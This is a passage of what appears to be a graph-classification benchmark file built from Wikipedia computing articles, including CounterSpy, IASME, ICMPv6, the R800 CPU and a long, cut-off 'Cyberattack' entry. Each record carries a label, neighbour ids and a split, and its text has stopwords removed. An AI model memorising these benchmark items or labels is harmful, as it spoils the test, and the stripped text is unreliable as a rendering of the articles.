    "text": "GT_Racing_Cockpit:gt racing cockpit gt racing cockpit see trademark symbols difference name line gran turismo official video game racing cockpits designed sparco logitech a.k.a logicool japan collaboration polyphony digital official kits co-designed released japan logicool sparco distributed import tuner endless north america compatible kits designed released worldwide european manufacturers playseats movetech fia homologated driving simulation cockpit line sku lpsk standing logicool playstation sparco kit official kits logicool auto part maker sparco joint designed sparco racing cockpit/seat official wheels gt force wheels although gt force wheels supported professional oriented playseats compatible kits line playseats based upon different design e.g g25 racing wheel playseats kit includes parts named gearshift holder seat slider sparco racing cockpit official kit original gt force gran turismo 3 a-spec released japan 2001 kits two parts named steering pod bucket chair official product steering pod features sparco gran turismo double name emblem plate sparco speed seat gt logos official kit gt force pro gran turismo 5 prologue sparco racing cockpit pro fighter model released december 22 2003 japan first kit one features emblem plate logos racing cockpit pro kits specially designed gt force pro wheel compatible models including prior gt force wheels updated version gt force pro gran turismo 4 kit released june 10 2004 japan kit replaces fighter seat gran turismo custom sparco speed seat evolution speed bucket seat still features official sparco gran turismo plate logos released june 2005 endless sku north american licensed version racing cockpit pro hence srcp sparco racing cockpit pro seat kit frame e.g steering floor mat steering pod official sparco gran turismo plate available though sparco sprint bucket seat north american version lpsk-02002 though replaces fighter bucket seat similar sparco model called sprint although sparco gran turismo plate included sparco seat regular one gt logo larger individuals version type 1 simultaneously released north american market version called sparco siena reclinable seat type 2 replaces regular bucket seat larger retractable model called siena srcp-001 kit sparco seat gt custom",
    "neighbors": [
      5746,
      5291,
      1974
    ],
    "mask": "Train"
  },
  {
    "node_id": 4676,
    "label": 0,
    "text": "Hindi-to-Punjabi_Machine_Translation_System:hindi-to-punjabi machine translation system hindi punjabi machine translation system developed punjabi university patiala gurpreet singh lehal dr. vishal goyal aimed translate hindi text punjabi text based direct approach includes preprocessing text normalization replacing collocations replacing proper nouns translation engine identifying surnames identifying titles lexicon lookup word-sense disambiguation inflection analysis transliteration post processing module system available online",
    "neighbors": [
      538,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 4677,
    "label": 4,
    "text": "CounterSpy_(software):counterspy software counterspy proprietary spyware removal program microsoft windows software developed sunbelt software counterspy scans pc spyware examining files hard drive objects memory windows registry cookies capability called dnr resuscitate according sunbelt improves chances killing resuscitators past tool based used giant antispyware engine program currently version 3.1 sunbelt software released version 2 includes revamped interface smaller memory footprint available download 15-day trial version effective may 23 2011 counterspy discontinued longer available purchase",
    "neighbors": [
      5891,
      6797,
      7886,
      7983,
      10392,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 4678,
    "label": 4,
    "text": "IASME:iasme iasme governance information assurance standard designed simple affordable help improve cyber security small medium-sized enterprises smes iasme governance technical controls aligned cyber essentials scheme certification iasme standard includes certification cyber essentials iasme governance standard developed 2010 proven effective improving security supply chains large organisations standard maps closely international iso/iec 27001 information assurance standard iasme governance originally developed academic-sme partnership attracted lot interest government small businesses research towards iasme model undertaken uk 2009-10 acknowledgement current international information assurance standard iso/iec 27001 complex resource-strapped smes providing weakness supply chain iasme developed 2010-11 launched later year revised regularly keep pace changes risk environment smes development process smes explained published international sme conference paper iasme governance standard follows implementation pattern used international standards community including pdca plan-do-check-act principles information security management system isms provides management framework refined expressed business terms recognisable organisations sizes iasme governance standard developed piloted help small businesses mostly west midlands uk encouraging results standard shown useful smes uk internationally large organisations use iasme governance standard supply chains understand reduce supplier risk article explaining supply chain benefits written developer david booth large small organisations use iasme certification alternative iso/iec 27001 standard standard managed iasme consortium ltd operate network 150 certification bodies licensed certify candidate organisations question set free anyone download without registration licensed creative commons by-nc-nd license standard available two levels assurance 2017 standard updated include additional questions enable organisations comply general data protection regulations gdpr iasme governance standard covers following information security topics iasme governance risk-led standard similar set controls annex iso/iec 27001 standard iasme governance maps closely uk government ncsc 10 steps cyber security mapping two standards available cyber assessment framework caf developed uk government allow organisations demonstrate compliance nis directive iasme governance standard maps closely caf nhs digital data security protection toolkit online self-assessment tool allows organisations measure performance national data guardian ’ 10 data security standards iasme governance maps closely toolkit majority topics iasme standard become focus attention information security threat uk businesses continues increase vulnerabilities systems continue cause expensive data breaches system failures increasing number newspaper journal articles subject reflect increased security awareness recognised states jersey suitable security standard government supply chain iasme specifically mentioned keynote speech infosec europe 2013 event held london received innovation award computer weekly europe shortly afterwards.. april 2019 iasme awarded cyber business year prestigious uk national cyber awards",
    "neighbors": [
      6360,
      7979,
      9901,
      10823
    ],
    "mask": "None"
  },
  {
    "node_id": 4679,
    "label": 3,
    "text": "Acorn_Network_Computer:acorn network computer acorn network computer network computer type thin client designed manufactured acorn computers ltd implementation network computer reference profile oracle corporation commissioned acorn specify network computers detail history see acorn network computer sophie wilson acorn led effort launched august 1996 ncos operating system used first implementation based risc os ran arm hardware manufacturing obligations achieved contract fujitsu subsidiary d2d 1997 acorn offered designs cost licensees netstation available two versions one modem home use via television version ethernet card use businesses schools vga monitors on-site bsd unix fileserver based riscbsd early arm port netbsd versions upgradable modem ethernet cards replaceable podules acorn-format eurocards home version trialled 1997/98 conjunction bt used supported pal ntsc svga displays identical specifications used strongarm sa-110 200mhz processor arm7500-based desklite launched 1998 acorn continued produce arm-based designs demonstrating first strongarm prototype may 1996 6 months later evolved concord launched late 1997 designs included set-top box nc second generation network computer operating system longer based risc os instead consisted netbsd 1.2.1 code later ncs produced based intel pentium architecture netstation planned ship smart card enable internet banking",
    "neighbors": [
      1121,
      3722,
      9163,
      9964,
      10862,
      7983,
      1776,
      9137,
      9745,
      10481,
      5492,
      10325,
      10548,
      1849,
      9978,
      1790,
      5375
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4680,
    "label": 1,
    "text": "Borland_Database_Engine:borland database engine borland database engine bde windows-based core database engine connectivity software behind borland delphi c++builder intrabuilder paradox windows visual dbase windows borland ’ turbo pascal database toolbox add-on beginning borland compiler add-ons facilitated database connectivity came paradox engine windows – pxengwin – could compiled program facilitate connectivity paradox tables first dll-based connectivity engine odapi open database api represented borland ’ attempt centralise connectivity suite applications included brand-new paradox windows 4 quattro version 4.5 5.0 paradox windows database engine crystallised idapi 2000 borland introduced new sql driver architecture called dbexpress deprecated bde sql links technology 2014 embarcadero removed bde installer rad studio xe7 install making separate download order strengthen message bde deprecated number years programmers using bde encouraged update software use newer database connectivity technologies like embarcadero firedac third party provided solutions included set database drivers enables consistent access standard data sources paradox dbase foxpro access text databases add microsoft odbc drivers needed built-in odbc socket optionally borland sql links product provides access range database management systems dbms including informix db2 interbase oracle sybase bde object-oriented design runtime application developers interact bde creating various bde objects runtime objects used manipulate database entities tables queries bde application program interface api provides direct c c++ optimized access database engine well bde built-in drivers dbase paradox foxpro access text databases core database engine files consist set dlls fully re-entrant thread-safe included bde set supplemental tools examples sample code bde system configured using bde administrator bdeadmin.exe included bde borland local sql subset ansi-92 sql enhanced support paradox dbase standard naming conventions tables fields called columns sql local sql lets use sql query local standard database tables reside database server well remote dbms servers local sql also essential make multi-table queries across local standard tables remote sql servers older name bde api integrated database application program interface idapi",
    "neighbors": [
      6850,
      7523,
      6797,
      10413,
      4592,
      10737,
      10899,
      4598,
      3096,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4681,
    "label": 4,
    "text": "Application_portfolio_attack_surface:application portfolio attack surface realm application security term application portfolio attack surface apas refers collective risk organization posed sum total security vulnerabilities found within set mission critical systems software run organization enterprise",
    "neighbors": [
      5404
    ],
    "mask": "None"
  },
  {
    "node_id": 4682,
    "label": 3,
    "text": "R800_(CPU):r800 cpu r800 central processing unit used msx turbo-r home computer r800 designed ascii corporation japan built mitsui co. ltd.. goals fastest cpu possible maintaining compatibility old msx zilog z80-based hardware software order preserve software compatibility old msx software r800 uses superset z80 instruction set addition z80 opcodes two multiplication instructions added mulub 8-bit muluw 16-bit also many undocumented z80 instructions made official including opcodes dealing ix iy 8-bit registers ixh ixl iyh iyl r800 based directly z80 stems z800 family lacks undocumented z80 features instance undocumented flags represented bits 3 5 f register n't assume values z80 causing fail zexall tests undocumented opcode often called sll alias sla instruction hardware side radical changes made internal 4-bit alu z80 replaced new 16-bit alu opcodes like add hl bc previously took 11 clock cycles run fast one bus cycle conditions maximum cpu clock speed also increased 14.32 mhz—four times fast original 3.57 mhz z80 used msx bus clock increased 7.16 mhz data bus remained 8-bit maintain compatibility old hardware additional changes made way cpu fetches opcodes original z80 uses 4 cycles fetch simple instruction like additional waitstate issued msx architecture review z80 fetch mechanism typical msx environment needed understand r800 since implementations msx use ram memory disposed 256×256 bytes block two cycles required set address fetch r800 avoids remembering last known state higher 8-bits next instruction 256-byte boundaries higher 8-bits set cycle saved however z80 refresh cycles destroy information higher bits workaround needed solution used r800 refresh entire blocks ram instead refreshing one line ram instruction issued 30μs cpu halted 4μs time used refresh block ram since refresh fetch instructions waitstate removed due faster ram chips simple instructions issued using one cycle cycle would cycle 2 z80 example cycle 1 becomes optional issued program crosses 256-byte boundary applies fast ram used msx turbor external hardware connected cartridge slots uses timings similar z80 even internal rom turbor fast enough fetch scheme additional chips turbor mirror contents rom ram order make run faster",
    "neighbors": [
      5762,
      6020,
      5128,
      2573,
      9006,
      1776,
      4465,
      372,
      6203,
      1501
    ],
    "mask": "Train"
  },
  {
    "node_id": 4683,
    "label": 7,
    "text": "Chromebit:chromebit chromebit dongle running google chrome os operating system placed hdmi port television monitor device turns display personal computer chromebit allows adding keyboard mouse bluetooth wi-fi device announced april 2015 began shipping november chromebit turns display hdmi port desktop variant chromebook laptop runs google chrome os operating system chrome os primarily supports single application web browser thereby relying heavily internet connection software functionality data storage chromebits superficial resemblance chromecast another google device whereas chromecast designed display video still images television large-screen display chromebit self-contained personal computer device compete intel compute stick offers similar plug-in functionality using two operating systems windows 8.1 ubuntu internally first chromebit resembles standard chromebook laptop device features 802.11ac wi-fi bluetooth 4.0 well usb 2.0 port one end end swivels enabling fit variety hdmi slots google announced chromebit march 31 2015 google asus began shipping first model november",
    "neighbors": [
      4096,
      4623,
      3600,
      8719,
      7700,
      9244,
      9766,
      5159,
      10284,
      3121,
      3633,
      11343,
      3664,
      7248,
      8285,
      2658,
      4194,
      5732,
      8821,
      2170,
      7816,
      4236,
      10893,
      5262,
      6800,
      11408,
      10393,
      8858,
      7841,
      6307,
      1203,
      7352,
      7359,
      4289,
      196,
      3269,
      3782,
      1224,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      3819,
      236,
      9970,
      7926,
      3836,
      253,
      8446,
      5892,
      8455,
      2328,
      4377,
      8986,
      10009,
      10525,
      798,
      288,
      4901,
      6444,
      8495,
      5431,
      2875,
      10045,
      11590,
      8520,
      11592,
      4429,
      9039,
      3409,
      1362,
      10090,
      5483,
      5499,
      7548,
      11646,
      1409,
      4995,
      9610,
      911,
      1935,
      8592,
      5522,
      1427,
      5524,
      2965,
      10645,
      1435,
      2978,
      1959,
      3499,
      7595,
      2496,
      4044,
      4048,
      9682,
      467,
      3043,
      6632,
      5100,
      7660,
      9712
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4684,
    "label": 9,
    "text": "SAM76:sam76 sam76 macro programming language used late 1970s present 2007 initially ran cp/m sam76 language list string processor designed interactive user-directed applications including artificial intelligence programming permits high portability machine machine language shares certain features common lisp forth shell programming languages unix operating system claude a. r. kagan language developer sought combine within single interpretive processor characteristics two different string general-purpose macro generators provisions embed multiple infix operator mathematical systems sam76 designed language based around idea programming macros user define macro code word defined user invoke specific set instructions perform routine within program execute set instructions usually either machine assembly language use macro program way user need define routine particular operation string required user substitute macro name since language rewritten c compiles windows unix linux similar operating systems source code available online still compiles runs 2006 sam76 language follows well defined syntax easy learn read relies heavily however system symbols replace pseudo english words basic pascal sam76 interpreter also provides highly reactive interactive language almost converse user task task consequently language capability performing complex operations program control text editing manipulation gaming simulation mathematics features similar lisp forth list processors sam76 also capability functioning query language providing powerful human machine interaction uses keyboard data interaction modify shape future responses language also capable growing extension like lisp logo almost difference procedures data structures procedures treated data acted upon procedures even procedures defined different users new procedures mapped created behave language primitives inherent functions language like logo means new users create separate vocabularies saved executed adding language vocabulary providing individual customization",
    "neighbors": [
      3904,
      6594,
      6502,
      8262,
      1804,
      6797,
      8524,
      10387,
      5492,
      823,
      4409,
      2045,
      6430
    ],
    "mask": "None"
  },
  {
    "node_id": 4685,
    "label": 2,
    "text": "List_of_Android_launchers:list android launchers list android launchers presents main view device responsible starting apps hosting live widgets 51 lyse kim 8 march 2019 go launcher popular android launcher retrieved original 28 february 2019",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      7722,
      5677,
      1083,
      6212,
      69,
      8262,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      8413,
      9949,
      1255,
      8940,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      3380,
      10037,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      7103,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4686,
    "label": 6,
    "text": "ZFS+:zfs+ zfs+ combined file system logical volume manager software subsystem initially released common development distribution license cddl based zfs originally developed sun microsystems proprietary data deduplication features added greenbytes subsequently made proprietary storage system product greenbytes originally owned trademark zfs+ confused zfs trademark currently held oracle corporation greenbytes owned oracle greenbytes created storage appliance called cypress nas filer originally based upon sun microsystems x86-64-based sun fire x4500 platform bundled zfs+ implementation value-add technology greenbytes claimed zfs+ technology could reduce storage power consumption 50 2009 greenbytes relaunched technology new name gbfs greenbytes file system",
    "neighbors": [
      9665,
      9762,
      5356,
      4438,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4687,
    "label": 5,
    "text": "Internet_Control_Message_Protocol_for_IPv6:internet control message protocol ipv6 internet control message protocol version 6 icmpv6 implementation internet control message protocol icmp internet protocol version 6 ipv6 icmpv6 defined rfc 4443 icmpv6 integral part ipv6 performs error reporting diagnostic functions e.g. ping framework extensions implement future changes several extensions published defining new icmpv6 message types well new options existing icmpv6 message types neighbor discovery protocol ndp node discovery protocol ipv6 replaces enhances functions arp secure neighbor discovery send extension ndp extra security multicast listener discovery mld used ipv6 routers discovering multicast listeners directly attached link much like internet group management protocol igmp used ipv4 multicast router discovery mrd allows discovery multicast routers icmpv6 messages may classified error messages information messages icmpv6 messages transported ipv6 packets ipv6 next header value icmpv6 set value 58 icmpv6 message consists header protocol payload header contains three fields type 8 bits code 8 bits checksum 16 bits type specifies type message values range 0 127 high-order bit 0 indicate error message values range 128 255 high-order bit 1 indicate information message code field value depends message type provides additional level message granularity checksum field provides minimal level integrity verification icmp message control messages identified value type field code field gives additional context information message messages serve purpose correspondingly named icmp message types note table comprehensive current complete list assigned icmpv6 types found link iana icmpv6 parameters icmpv6 provides minimal level message integrity verification inclusion 16-bit checksum header checksum calculated starting pseudo-header ipv6 header fields according ipv6 standard consists source destination addresses packet length next header field latter set value 58 following pseudo header checksum continued icmpv6 message checksum computation performed according internet protocol standards using 16-bit ones complement summation followed final ones complement checksum inserting checksum field note differs way calculated ipv4 icmp similar calculation done tcp icmpv6 node receives packet must undertake actions depend type message icmpv6 protocol must limit number error messages sent destination avoid network overloading example node continues forward erroneous packets icmp signal error first packet periodically fixed minimum period fixed network maximum load icmp error message must never sent response another icmp error message",
    "neighbors": [
      10242,
      1030,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      6724,
      8265,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      649,
      7817,
      9868,
      3218,
      9365,
      11413,
      152,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      3322,
      9987,
      3847,
      10005,
      5402,
      4891,
      5405,
      8482,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      367,
      891,
      6524,
      11647,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      8692,
      6651,
      3580,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 4688,
    "label": 8,
    "text": "Java_API_for_XML-based_RPC:java api xml-based rpc java api xml-based rpc jax-rpc allows java application invoke java-based web service known description still consistent wsdl description jax-rpc one java xml programming apis seen java rmis web services jax-rpc 2.0 renamed jax-ws 2.0 java api xml web services jax-rpc 1 deprecated java ee 6 jax-rpc service utilizes w3c world wide web consortium standards like wsdl web service description language works follows advantage method allows web service implemented server-side servlet ejb container thus servlet ejb applications made available web services",
    "neighbors": [
      4960,
      9441,
      4740,
      10020,
      8070,
      1128,
      5677,
      6328,
      3517,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 4689,
    "label": 4,
    "text": "Cyberattack:cyberattack computers computer networks attack attempt expose alter disable destroy steal gain unauthorized access make unauthorized use asset cyberattack type offensive maneuver targets computer information systems infrastructures computer networks personal computer devices attacker person process attempts access data functions restricted areas system without authorization potentially malicious intent depending context cyberattacks part cyberwarfare cyberterrorism cyberattack employed nation-states individuals groups society organizations may originate anonymous source cyberattack may steal alter destroy specified target hacking susceptible system cyberattacks range installing spyware personal computer attempting destroy infrastructure entire nations legal experts seeking limit use term incidents causing physical damage distinguishing routine data breaches broader hacking activities cyberattacks become increasingly sophisticated dangerous user behavior analytics siem used help prevent attacks since late 1980s cyberattacks evolved several times use innovations information technology vectors committing cybercrimes recent years scale robustness cyberattacks increased rapidly observed world economic forum 2018 report offensive cyber capabilities developing rapidly ability deal hostile incidents may 2000 internet engineering task force defined attack rfc 2828 cnss instruction 4009 dated 26 april 2010 committee national security systems united states america defines attack increasing dependencies modern society information computers networks private public sectors including military led new terms like cyber attack cyberwarfare cnss instruction 4009 define cyber attack first six months 2017 two billion data records stolen impacted cyberattacks ransomware payments reached double 2016 cyberwarfare utilizes techniques defending attacking information computer networks inhabit cyberspace often prolonged cyber campaign series related campaigns denies opponent ability employing technological instruments war attack opponent critical computer systems cyberterrorism hand use computer network tools shut critical national infrastructures energy transportation government operations coerce intimidate government civilian population means end result cyberwarfare cyberterrorism damage critical infrastructures computer systems linked together within confines cyberspace three factors contribute cyber-attacks launched state individual fear factor spectacularity factor vulnerability factor spectacularity factor measure actual damage achieved attack meaning attack creates direct losses usually loss availability loss income garners negative publicity 8 february 2000 denial service attack severely reduced traffic many major sites including amazon buy.com cnn ebay attack continued affect still sites next day amazon reportedly estimated loss business 600,000 vulnerability factor exploits vulnerable organization government establishment cyber-attacks organizations without maintenance systems might running old servers vulnerable updated systems organization vulnerable denial service attack government establishment defaced web page computer network attack disrupts integrity authenticity data usually malicious code alters program logic controls data leading errors output professional hackers either working employed government military service find computer systems vulnerabilities lacking appropriate security software vulnerabilities found infect systems malicious code remotely control system computer sending commands view content disrupt computers needs pre-existing system flaw within computer antivirus protection faulty system configuration viral code work many professional hackers promote cyberterrorists new set rules govern actions cyberterrorists premeditated plans attacks born rage need develop plans step-by-step acquire appropriate software carry attack usually political agendas targeting political structures cyber terrorists hackers political motivation attacks impact political structure corruption destruction also target civilians civilian interests civilian installations previously stated cyberterrorists attack persons property cause enough harm generate fear attack active passive attack perpetrated insider outside organization term attack relates basic security terms shown following diagram resource physical logical called asset one vulnerabilities exploited threat agent threat action result confidentiality integrity availability resources may compromised potentially damage may extend resources addition one initially identified vulnerable including resources organization resources involved parties customers suppliers so-called cia triad basis information security attack active attempts alter system resources affect operation compromises integrity availability passive attack attempts learn make use information system affect system resources compromises confidentiality threat potential violation security exists circumstance capability action event could breach security cause harm threat possible danger might exploit vulnerability threat either intentional i.e. intelligent e.g. individual cracker criminal organization accidental e.g. possibility computer malfunctioning possibility act god earthquake fire tornado set policies concerned information security management information security management systems isms developed manage according risk management principles countermeasures order accomplish security strategy set following rules regulations applicable country attack led security incident i.e security event involves security violation words security-relevant system event system security policy disobeyed otherwise breached overall picture represents risk factors risk scenario organization make steps detect classify manage security incidents first logical step set incident response plan eventually computer emergency response team order detect attacks number countermeasures set organizational procedural technical levels computer emergency response team information technology security audit intrusion detection system example attack usually perpetrated someone bad intentions black hatted attacks falls category perform penetration testing organization information system find foreseen controls place attacks classified according origin i.e conducted using one computers last case called distributed attack botnets used conduct distributed attacks classifications according procedures used type vulnerabilities exploited attacks concentrated network mechanisms host features attacks physical i.e theft damage computers equipment others attempts force changes logic used computers network protocols order achieve unforeseen original designer result useful attacker software used logical attacks computers called malware following partial short list attacks detail number techniques utilize cyber-attacks variety ways administer individuals establishments broader scale attacks broken two categories syntactic attacks semantic attacks syntactic attacks straightforward considered malicious software includes viruses worms trojan horses virus self-replicating program attach another program file order reproduce virus hide unlikely locations memory computer system attach whatever file sees fit execute code also change digital footprint time replicates making harder track computer worm need another file program copy self-sustaining running program worms replicate network using protocols latest incarnation worms make use known vulnerabilities systems penetrate execute code replicate systems code red ii worm infected 259 000 systems less 14 hours much larger scale worms designed industrial espionage monitor collect server traffic activities transmit back creator trojan horse designed perform legitimate tasks also performs unknown unwanted activity basis many viruses worms installing onto computer keyboard loggers backdoor software commercial sense trojans imbedded trial versions software gather additional intelligence target without person even knowing happening three likely attack individual establishment emails web browsers chat clients remote software updates semantic attack modification dissemination correct incorrect information information modified could done without use computers even though new opportunities found using set someone wrong direction cover tracks dissemination incorrect information utilized two instances india pakistan involved cyberspace conflicts started 1990s earlier cyber attacks came known early 1999 since india pakistan engaged long-term dispute kashmir moved cyberspace historical accounts indicated country hackers repeatedly involved attacking computing database system number attacks grown yearly 45 1999 133 2000 275 end august 2001 2010 indian hackers laid cyber attack least 36 government database websites going name indian cyber army 2013 indian hackers hacked official website election commission pakistan attempt retrieve sensitive database information retaliation pakistani hackers calling true cyber army hacked defaced ~1,059 websites indian election bodies according media pakistan working effective cyber security system program called cyber secure pakistan csp program launched april 2013 pakistan information security association program expanded country universities within cyberwarfare individual must recognize state actors involved committing cyber-attacks one another two predominant players discussed age-old comparison east versus west china cyber capabilities compared united states capabilities many state non-state actors involved cyberwarfare russia iran iraq al qaeda since china u.s. leading foreground cyberwarfare capabilities two state actors discussed q2 2013 akamai technologies reported indonesia toppled china portion 38 percent cyber attack high increase 21 percent portion previous quarter china set 33 percent us set 6.9 percent 79 percent attack came asia pacific region indonesia dominated attacking ports 80 443 90 percent china people liberation army pla developed strategy called integrated network electronic warfare guides computer network operations cyberwarfare tools strategy helps link together network warfare tools electronic warfare weapons opponent information systems conflict believe fundamentals achieving success seizing control opponent information flow establishing information dominance science military science campaigns identify enemy logistics systems networks highest priority cyber-attacks states cyberwarfare must mark start campaign used properly enable overall operational success focusing attacking opponent infrastructure disrupt transmissions processes information dictate decision-making operations pla would secure cyber dominance adversary predominant techniques would utilized conflict gain upper hand follows pla would strike electronic jammers electronic deception suppression techniques interrupt transfer processes information would launch virus attacks hacking techniques sabotage information processes hopes destroying enemy information platforms facilities pla science campaigns noted one role cyberwarfare create windows opportunity forces operate without detection lowered risk counterattack exploiting enemy periods blindness deafness paralysis created cyber-attacks one main focal points cyberwarefare able weaken enemy full extent possible physical offensive higher percentage success pla conduct regular training exercises variety environments emphasizing use cyberwarfare tactics techniques countering tactics employed faculty research focusing designs rootkit usage detection kylin operating system helps train individuals cyberwarfare techniques china perceives cyberwarfare deterrent nuclear weapons possessing ability greater precision leaving fewer casualties allowing long ranged attacks west united states provides different tone voice cyberwarfare tip everyone tongue united states provides security plans strictly response cyberwarfare basically going defensive attacked devious cyber methods u.s. responsibility cybersecurity divided department homeland security federal bureau investigation department defense recent years new department created specifically tend cyber threats department known cyber command cyber command military subcommand us strategic command responsible dealing threats military cyber infrastructure cyber command service elements include army forces cyber command twenty-fourth air force fleet cyber command marine forces cyber command ensures president navigate control information systems also military options available defense nation needs enacted cyberspace individuals cyber command must pay attention state non-state actors developing cyberwarfare capabilities conducting cyber espionage cyber-attacks nation allies cyber command seeks deterrence factor dissuade potential adversaries attacking u.s. multi-faceted department conducting cyber operations three prominent events took place may catalysts creation idea cyber command failure critical infrastructure reported cia malicious activities information technology systems disrupted electrical power capabilities overseas resulted multi-city power outages across multiple regions second event exploitation global financial services november 2008 international bank compromised payment processor allowed fraudulent transactions made 130 automated teller machines 49 cities within 30-minute period last event systemic loss u.s. economic value industry 2008 estimated 1 trillion losses intellectual property data theft even though events internal catastrophes real nature meaning nothing stop state non-state actors thing even grander scale initiatives like cyber training advisory council created improve quality efficiency sufficiency training computer network defense attack exploitation enemy cyber operations ends spectrum east west nations show sword shield contrast ideals chinese offensive minded idea cyberwarfare trying get pre-emptive strike early stages conflict gain upper-hand u.s. reactionary measures taken creating systems impenetrable barriers protect nation civilians cyber-attacks according homeland preparedness news many mid-sized u.s. companies difficult time defending systems cyber attacks around 80 percent assets vulnerable cyber attack owned private companies organizations former new york state deputy secretary public safety michael balboni said private entities type capability bandwidth interest experience develop proactive cyber analysis response cyber-attacks 1 april 2015 president obama issued executive order establishing first-ever economic sanctions executive order impact individuals entities designees responsible cyber-attacks threaten national security foreign policy economic health financial stability us specifically executive order authorizes treasury department freeze designees assets according ted koppel book 2008 united states collaboration israel ran cyberattack iran nuclear program becoming first use digital weapon instrument policy series powerful cyber attacks began 27 june 2017 swamped websites ukrainian organizations including banks ministries newspapers electricity firms fifa world cup 2018 russia countered stopped around 25 million cyber attacks infrastructure june 2019 russia conceded possible electrical grid cyberattack united states new york times reported american hackers united states cyber command planted malware potentially capable disrupting russian electrical grid 2007 cyberattacks estonia series cyberattacks began 27 april 2007 targeted websites estonian organizations including estonian parliament banks ministries newspapers broadcasters amid country disagreement russia relocation bronze soldier tallinn elaborate soviet-era grave marker well war graves tallinn attacks triggered number military organizations around world reconsider importance network security modern military doctrine direct result cyberattacks creation nato cooperative cyber defence centre excellence tallinn 2019 reuters reported united arab emirates launched series cyberattacks political opponents journalists human rights activists project raven espionage platform namely karma team included ex-us intelligence agents project raven commenced 2009 planned continued coming ten years whole industry working trying minimize likelihood consequence information attack partial list see offer different products services aimed many organizations trying classify vulnerability consequence famous vulnerability database common vulnerabilities exposures computer emergency response teams set government large organization handle computer security incidents cyber-attack initiated certain targets need attacked cripple opponent certain infrastructures targets highlighted critical infrastructures time conflict severely cripple nation control systems energy resources finance telecommunications transportation water facilities seen critical infrastructure targets conflict new report industrial cybersecurity problems produced british columbia institute technology pa consulting group using data far back 1981 reportedly found 10-fold increase number successful cyber-attacks infrastructure supervisory control data acquisition scada systems since 2000 cyberattacks adverse physical effect known cyber-physical attacks control systems responsible activating monitoring industrial mechanical controls many devices integrated computer platforms control valves gates certain physical infrastructures control systems usually designed remote telemetry devices link physical devices internet access modems little security offered dealing devices enabling many hackers cyberterrorists seek systematic vulnerabilities paul blomgren manager sales engineering cybersecurity firm explained people drove remote substation saw wireless network antenna immediately plugged wireless lan cards took laptops connected system n't using passwords within 10 minutes mapped every piece equipment facility blomgren said within 15 minutes mapped every piece equipment operational control network within 20 minutes talking business network pulled several business reports never even left vehicle energy seen second infrastructure could attacked broken two categories electricity natural gas electricity also known electric grids power cities regions households powers machines mechanisms used day-to-day life using u.s. example conflict cyberterrorists access data daily report system status shows power flows throughout system pinpoint busiest sections grid shutting grids cause mass hysteria backlog confusion also able locate critical areas operation attacks direct method cyberterrorists access instructions connect bonneville power administration helps direct fault system process major advantage utilized cyber-attacks made foreign attackers prior knowledge system attack highest accuracy without drawbacks cyberattacks natural gas installations go much way would attacks electrical grids cyberterrorists shutdown installations stopping flow even reroute gas flows another section occupied one allies case russia gas supplier known gazprom lost control central switchboard routes gas flow inside operator trojan horse program bypassed security financial infrastructures could hit hard cyber-attacks financial system linked computer systems constant money exchanged institutions cyberterrorists attack transactions rerouted large amounts money stolen financial industries would collapse civilians would without jobs security operations would stall region region causing nationwide economical degradation u.s. alone average daily volume transactions hit 3 trillion 99 non-cash flow able disrupt amount money one day period days cause lasting damage making investors pull funding erode public confidence cyberattack financial institution transactions may referred cyberheist attacks may start phishing targets employees using social engineering coax information may allow attackers hack network put keyloggers accounting systems time cybercriminals able obtain password keys information organization bank accounts accessed via information stolen using keyloggers may 2013 gang carried us 40 million cyberheist bank muscat cyberattacking telecommunication infrastructures straightforward results telecommunication integration becoming common practice systems voice ip networks merging everything run internet speeds storage capabilities endless denial-of-service attacks administered previously mentioned complex attacks made bgp routing protocols dns infrastructures less likely attack would target compromise traditional telephony network ss7 switches attempted attack physical devices microwave stations satellite facilities ability would still shut physical facilities disrupt telephony networks whole idea cyber-attacks cut people one another disrupt communication impede critical information sent received cyberwarfare critical way gaining upper-hand conflict controlling flow information communication nation plan accurate strikes enact better counter-attack measures enemies transportation infrastructure mirrors telecommunication facilities impeding transportation individuals city region economy slightly degrade time successful cyber-attacks impact scheduling accessibility creating disruption economic chain carrying methods impacted making hard cargo sent one place another january 2003 slammer virus continental airlines forced shut flights due computer problems cyberterrorists target railroads disrupting switches target flight software impede airplanes target road usage impede conventional transportation methods may 2015 man chris roberts cyberconsultant revealed fbi repeatedly 2011 2014 managed hack boeing airbus flights controls via onboard entertainment system allegedly least ordered flight climb fbi detaining april 2015 syracuse interviewed allegations water infrastructure could one critical infrastructures attacked seen one greatest security hazards among computer-controlled systems potential massive amounts water unleashed area could 